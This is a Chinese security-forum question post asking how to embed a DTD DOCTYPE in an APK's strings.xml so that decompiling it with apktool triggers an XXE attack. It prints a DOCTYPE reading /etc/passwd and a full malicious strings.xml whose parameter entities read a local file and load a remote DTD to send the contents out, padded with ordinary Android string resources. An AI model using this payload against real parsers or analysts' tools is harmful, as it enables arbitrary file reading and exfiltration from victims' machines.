-
-
[求助][讨论] 如何在APK的AndroidManifest.xml 或 res/values/strings.xml中 插入DTD的DOCTYPE语法?
-
发表于:
2017-12-22 09:48
3799
-
[求助][讨论] 如何在APK的AndroidManifest.xml 或 res/values/strings.xml中 插入DTD的DOCTYPE语法?
XML概述
在XML DTD语法中,如果允许引入外部实体,允许出现<!DOCTYPE root[ <!ELEMENT file SYSTEM "file:///etc/passwd"]>这样的语法,Java 在parse该xml时,则有可能造成XXE漏洞攻击(可以造成任意文件读取上传等危害)。
在APK中,AndroidManifest.xml属于XML Schema模式。在用Android Studio build APK时,不允许出现DTD语法。但是在strings.xml中则允许出现DTD语法,在build过程中不会报错。
但是使用apktool decode APK时,发现该DTD语法并没有在decode后的strings.xml中出现。如果DTD存在于APK的strings.xml中,则在apktool decode时也会造成XXE攻击。
请问,有没有一种办法,可以使得把DTD语法(<!DOCTYPE root[ <!ELEMENT file SYSTEM "file:///etc/passwd"]>)build进APK的strings.xml中?
该问题的源头是这个漏洞:2d1K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2S2L8Y4q4#2j5h3&6C8k6g2)9J5k6h3y4G2L8g2)9J5c8Y4m8G2M7%4c8Q4x3V1k6A6k6q4)9J5c8U0R3&6x3K6p5$3
但是该漏洞十分局限,只能手工修改AndroidMainifest.xml文件,在build时触发XXE,实际的危害几乎为0.
补充一下测试用的evil strings.xml:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///tmp/xxetest">
<!ENTITY % dtd SYSTEM "27aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4x3W2)9J5k6e0p5^5i4K6u0W2x3q4)9J5k6e0u0Q4x3V1k6W2N6X3W2D9i4K6u0W2k6s2c8V1">
%dtd;
%all;
%send;
]>
<resources>
<string name="abc_action_bar_home_description">Navigate home</string>
<string name="abc_action_bar_home_description_format">%1$s, %2$s</string>
<string name="abc_action_bar_home_subtitle_description_format">%1$s, %2$s, %3$s</string>
<string name="abc_action_bar_up_description">Navigate up</string>
<string name="abc_action_menu_overflow_description">More options</string>
<string name="abc_action_mode_done">Done</string>
<string name="abc_activity_chooser_view_see_all">See all</string>
<string name="abc_activitychooserview_choose_application">Choose an app</string>
<string name="abc_capital_off">OFF</string>
<string name="abc_capital_on">ON</string>
<string name="abc_search_hint">Search…</string>
<string name="abc_searchview_description_clear">Clear query</string>
<string name="abc_searchview_description_query">Search query</string>
<string name="abc_searchview_description_search">Search</string>
<string name="abc_searchview_description_submit">Submit query</string>
<string name="abc_searchview_description_voice">Voice search</string>
<string name="abc_shareactionprovider_share_with">Share with</string>
<string name="abc_shareactionprovider_share_with_application">Share with %s</string>
<string name="abc_toolbar_collapse_description">Collapse</string>
<string name="search_menu_title">Search</string>
<string name="status_bar_notification_info_overflow">999+</string>
<string name="abc_font_family_body_1_material">sans-serif</string>
<string name="abc_font_family_body_2_material">sans-serif-medium</string>
<string name="abc_font_family_button_material">sans-serif-medium</string>
<string name="abc_font_family_caption_material">sans-serif</string>
<string name="abc_font_family_display_1_material">sans-serif</string>
<string name="abc_font_family_display_2_material">sans-serif</string>
<string name="abc_font_family_display_3_material">sans-serif</string>
<string name="abc_font_family_display_4_material">sans-serif-light</string>
<string name="abc_font_family_headline_material">sans-serif</string>
<string name="abc_font_family_menu_material">sans-serif</string>
<string name="abc_font_family_subhead_material">sans-serif</string>
<string name="abc_font_family_title_material">sans-serif-medium</string>
<string name="app_name">My Application</string>
</resources>
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
